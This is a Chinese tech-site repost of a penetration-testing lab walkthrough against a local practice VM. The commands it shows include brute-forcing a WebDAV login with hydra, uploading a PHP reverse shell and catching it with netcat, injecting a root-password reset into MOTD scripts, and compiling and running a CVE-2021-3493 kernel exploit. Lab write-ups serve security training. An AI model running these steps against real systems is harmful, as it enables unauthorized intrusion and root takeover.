IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> 网络安全之渗透靶场实战详解 -> 正文阅读

[网络协议]网络安全之渗透靶场实战详解

0x00 环境配置

虚拟网络编辑器:

1650118945_625ad1219e149118f89c5.png

Kali:
1650118952_625ad128083ba5c81a807.png
靶机:

1650118958_625ad12eb1f6b9f0c1d2f.png

0x01 主机发现/端口扫描

首先使用下面这条命令来发现靶机的ip地址为192.168.26.131

arp-scan -l

image.png

然后开始使用nmap进行端口和服务的发现

nmap  -sV -sC -p-   192.168.26.131

image.png

经过对开放端口和服务的扫描,发现只开放了22端口和80端口,访问80端口也没发现什么可以测试的点,于是开始使用dirsearch进行目录的扫描。

【一>所有资源获取<一】
1、很多已经买不到的绝版电子书
2、安全大厂内部的培训资料
3、全套工具包
4、100份src源码技术文档
5、网络安全基础入门、Linux、web安全、攻防方面的视频
6、应急响应笔记 7、 网络安全学习路线
8、ctf夺旗赛解析
9、WEB安全入门笔记

0x02 信息收集

dirsearch --url http://192.168.26.131

image.png

经过目录扫描,发现了webdav的路径,访问了一波,发现需要登录,这里简单讲一下什么是webdav:

image.png

image.png

0x03 密码字典定制

在我进行了多次简单的弱口令尝试后发现不行,于是开始使用kali自带的字典进行暴力破解,但是跑了很久失败了,所以我打算使用kali自带的字典生成工具cewl生成一个针对这个网站专属的字典进行测试一波。

cewl http://192.168.26.131  -w 192.168.26.131dict.txt

image.png

0x04 hydra密码爆破

hydra -L 192.168.26.131dict.txt -P 192.168.26.131dict.txt 192.168.26.131 http-get /webdav -v

1650119039_625ad17f125e0229da43e.png

成功的爆破出了账号和密码,果然还是生成的专属字典比较好用。由于我们获取了webdav服务的相关认证信息,所以接下来我直接开始使用kali自带的webdav测试工具davtest进行测试,看能否传文件上去,如果可以的话,我们可以直接将webshell传到服务器上,以便getshell突破边界。

0x05 webdav漏洞

davtest -url http://192.168.26.131/webdav -auth yamdoot:Swarg

1650119056_625ad190b05c844d51446.png

通过上图我们可以知道,我们可以通过获取到的信息凭证建立一个DAV连接,并且可以在靶机上创建目录和上传文件,而上传到上面的文件只有txt,php,html三种格式的文件可以被执行,那么到这里我们getshell的思路就有了, 直接传一个反弹shell的php文件,然后kali监听本地端口,然后访问这个文件,触发执行即可getshell。

cp /usr/share/webshells/php/php-reverse-shell.php .         #将kali自带反弹shell文件拷贝到当前目录
vim php-reverse-shell.php                                   #编辑这个文件,将ip改为kali的ip 端口改为kali的端口

![image.png](https://img-blog.csdnimg.cn/img_convert/13267318df81d6bde1c4be3097d6c1e3.png

davtest -url http://192.168.26.131/webdav -auth yamdoot:Swarg -uploadfile php-reverse-shell.php  -uploadloc rev.php

1650119080_625ad1a83b60b568f5674.png

通过上图可以看到,我们已经成功将反弹shell的文件上传到了靶机上,接下来kali监听本地端口,然后访问这个文件,触发执行即可getshell。

nc -lnvp 4444         #kali监听4444端口
http://192.168.26.131/webdav/rev.php         #访问该链接触发执行反弹shell的代码

image.png

python3 -c "import pty;pty.spawn('/bin/bash')"           #升级优化一下shell

0x06 MOTD注入提权

接下来我们通过下面这条命令找一些属主是root 普通用户或组可执行 其他用户可写的文件,这种文件往往可以帮助我们实现权限提升。

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null
#命令解释:
从根目录下开始查找 文件类型 属主是root 普通用户或组可执行 其他用户可写  如果发现了符合条件的用 ls -l命令显示  错误信息从定向到null

image.png
先cat了一下搜索到的第一个文件,发现里面有brainfuck加密的内容,所以尝试解密下。
image.png
在线解密网站:http://bf.doleczek.pl/
image.png

chitragupt

解密得到的这个可能是某个用户的密码,所以根据查看/etc/passwd文件发现的用户,挨个尝试下。
image.png
当我尝试切换到interno用户的时候,使用揭秘得到的这个字符串成功的su到了inferno用户上。到这里算是完成了从www-data权限到普通用户权限的权限提升。
image.png
然后我们在inferno用户的家目录下发现了第一个flag。
image.png
既然已经获取到了inferno用户的密码,我接下来尝试使用ssh登录到inferno用户上。

ssh inferno@192.168.26.131

成功登录到inferno用户后再次执行下面这条命令:

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

image.png
我观察到除了我们刚刚发现密码的那个文件,其他文件都在/etc/update-motd.d/这个目录下,motd是message of the day这句话的缩写,我们通过ssh登录成功后看到的那些欢迎和提示的信息都是motd目录下存放的这些sh脚本所提供的。
image.png
那么现在我们知道了,当我们通过ssh登录成功的时候,这些sh脚本会以root权限运行输出那些欢迎信息和日期等等,并且我们当前这个用户对这些文件可读可写,那么提权思路就有了,我们可以通过在这些sh脚本中写入一个修改root用户密码的命令,这样当我们通过ssh用户登录到inferno这个账号上的时候,我们这些motd的sh脚本就会被以root用户的权限执行,这时候我们写入的修改root用户密码的命令也会被执行,之后我们只需要切换到root用户即可完成提权,思路有了下面开始操作。

vi /etc/update-motd.d/00-header      #编辑这个文件
echo 'root:123' | chpasswd        #在文件末尾添加这一行,这行的意思就是,使用chpasswd命令将root用户的密码修改为123

image.png
然后保存修改后,退出ssh的连接,然后重新使用ssh登录,触发执行我们修改root用户的命令。
image.png
当我们看到登录成功后的欢迎语的时候,root用户的密码已经成功的被我们修改成了123。
接着只需要su到root用户即可提权成功。
image.png

0x07 CVE-2021-3493提权:

image.png
在ssh成功登录后的欢迎语中,知道了靶机的版本是Ubuntu18.04,对于该版本我比较熟悉,之前用过该版本的提权漏洞,所以这里不过多赘述。先将exp下载到kali本地。
image.png

scp exploit.c  inferno@192.168.26.131:/home/inferno       #将exp上传到靶机

1650119438_625ad30ef40910f253924.png

gcc exploit.c  -o exploit            #尝试编译exploit.c 并将编译好的文件命名为exploit

image.png
发现靶机上无法运行gcc,那么我们就在kali上先编译好,然后再传到靶机上即可。
1650119452_625ad31ca047bc01f037c.png

chmod +x exploit      #给exploit赋予执行权限
./exploit             #执行exp

image.png
可以看到通过CVE-2021-3493同样获取到了root权限
1650119467_625ad32bdc32c2681939d.png

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-04-29 12:30:01  更:2022-04-29 12:31:10 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 3:43:46-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码